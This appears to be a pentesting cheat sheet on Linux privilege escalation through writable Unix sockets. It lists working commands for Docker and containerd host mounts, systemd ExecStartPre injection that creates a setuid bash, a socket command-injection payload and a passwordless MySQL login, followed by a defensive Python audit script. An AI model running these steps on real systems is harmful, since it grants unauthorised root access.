
Overview

Unix domain sockets are inter-process communication endpoints backed by a file on the filesystem, so access to them is governed by ordinary file permissions (of the socket file and its parent directories). If a socket file is writable by you and a privileged service listens on it, you can connect to that service and abuse whatever it exposes to escalate privileges.

Enumerate Unix Sockets

ss -xlp
netstat -a -p --unix 2>/dev/null
find / -type s 2>/dev/null

Find Writable Sockets

find / -type s -writable 2>/dev/null

Check Socket Permissions

ls -la /var/run/*.sock
ls -la /tmp/*.sock

Docker Socket

The most common socket privilege escalation. See Docker / LXD Escape.

Quick Check

ls -la /var/run/docker.sock

If writable:

docker run -v /:/mnt --rm -it alpine chroot /mnt bash

Without the docker CLI, talk to the Engine API directly over the socket:

curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh"],"Binds":["/:/mnt"],"Privileged":true}' \
  http://localhost/containers/create

Writable .socket Files (systemd)

find /etc/systemd/system/ -writable -name "*.socket" 2>/dev/null

Inject ExecStartPre

In the writable unit's [Socket] section:

[Socket]
ListenStream=/run/vulnerable.sock
ExecStartPre=/bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'

Then reload and restart the unit (both commands need root; without it, the change only takes effect the next time the unit is started):

systemctl daemon-reload
systemctl restart vulnerable.socket

Create Missing Service

If a .socket unit exists but the .service it activates is missing:

# Check which service it activates
grep Service /etc/systemd/system/vulnerable.socket

Create the missing service unit (named by Service=, or by default the socket's basename with a .service suffix):

[Service]
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'

HTTP Sockets

Some services expose HTTP APIs over Unix sockets.

Connect

curl --unix-socket /var/run/service.sock http://localhost/
curl --unix-socket /var/run/service.sock http://localhost/api/v1/info

Socat

socat - UNIX-CLIENT:/var/run/service.sock

Netcat

nc -U /var/run/service.sock

MySQL Socket

ls -la /var/run/mysqld/mysqld.sock

Try connecting as root with no password over the socket:

mysql -u root -S /var/run/mysqld/mysqld.sock

Containerd Socket

ls -la /run/containerd/containerd.sock

If accessible:

ctr -a /run/containerd/containerd.sock image ls
ctr -a /run/containerd/containerd.sock run --rm -t --mount type=bind,src=/,dst=/mnt,options=rbind docker.io/library/alpine:latest shell /bin/sh

Then, inside the container:

chroot /mnt bash

Socket Command Injection

If a service reads input from the socket and passes it to a shell without escaping, command substitution in the input runs as the service's user:

echo '$(cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash)' | socat - UNIX-CLIENT:/var/run/vulnerable.sock

Socket Permissions

| Permission               | Risk                            |
|--------------------------|---------------------------------|
| World-writable socket    | Anyone can connect              |
| Group-readable/writable  | Group members can connect       |
| Root-owned, no auth      | Relies only on filesystem perms |
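As an added example that is not code from this page or from the bytejmp docs, a Python audit script that applies the permission table above to every socket under a directory, flags the Docker, containerd and MySQL sockets from the sections above as high impact (that name list is an assumption, not a set the page defines), and lists writable systemd .socket unit files.

```python
import os
import stat

HIGH_IMPACT = {  # keyed by basename since /var/run is usually a symlink to /run (assumption: illustrative list)
    "docker.sock": "Docker API: bind-mounting / gives host root",
    "containerd.sock": "containerd API: can run a privileged container",
    "mysqld.sock": "MySQL: root login over the socket may need no password",
}

def classify_socket(path, mode, uid, gid):
    """Map a socket inode's st_mode/st_uid/st_gid to (severity, reason); None if not a socket."""
    if not stat.S_ISSOCK(mode):
        return None
    if mode & stat.S_IWOTH:
        sev, why = "HIGH", "world-writable: anyone can connect"
    elif mode & stat.S_IWGRP:
        sev, why = "MEDIUM", "group-writable (gid %d): group members can connect" % gid
    else:
        sev, why = "INFO", "owner-only (uid %d): relies on filesystem perms alone" % uid
    # A high-impact endpoint reachable by non-owners is a root-equivalent exposure.
    if os.path.basename(path) in HIGH_IMPACT and sev != "INFO":
        sev, why = "CRITICAL", why + "; " + HIGH_IMPACT[os.path.basename(path)]
    return sev, why

def scan_sockets(root):
    """Walk `root` without following symlinks and classify every socket found."""
    findings = []
    for dirpath, _, names in os.walk(root, onerror=lambda e: None):
        for p in (os.path.join(dirpath, n) for n in names):
            try:
                st = os.lstat(p)
            except OSError:  # entry vanished or is unreadable
                continue
            f = classify_socket(p, st.st_mode, st.st_uid, st.st_gid)
            if f:
                findings.append((p, f[0], f[1]))
    return findings

def writable_socket_units(unit_dir="/etc/systemd/system"):
    """Return .socket unit files the current user can write (ExecStartPre injection risk)."""
    names = os.listdir(unit_dir) if os.path.isdir(unit_dir) else []
    return [os.path.join(unit_dir, n) for n in names
            if n.endswith(".socket") and os.access(os.path.join(unit_dir, n), os.W_OK)]

if __name__ == "__main__":  # live audit of the directories the page enumerates
    rows = scan_sockets("/run") + scan_sockets("/tmp")
    rows += [(u, "HIGH", "writable .socket unit file") for u in writable_socket_units()]
    for path, sev, why in rows:
        print(sev, path, why)
```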

Quick Reference

| Socket                          | Privesc                       |
|---------------------------------|-------------------------------|
| /var/run/docker.sock            | Mount host filesystem → root  |
| /run/containerd/containerd.sock | Run privileged container      |
| Writable .socket file           | Inject ExecStartPre           |
| MySQL socket (no password)      | DB access, potential UDF RCE  |
| HTTP API socket                 | Depends on exposed endpoints  |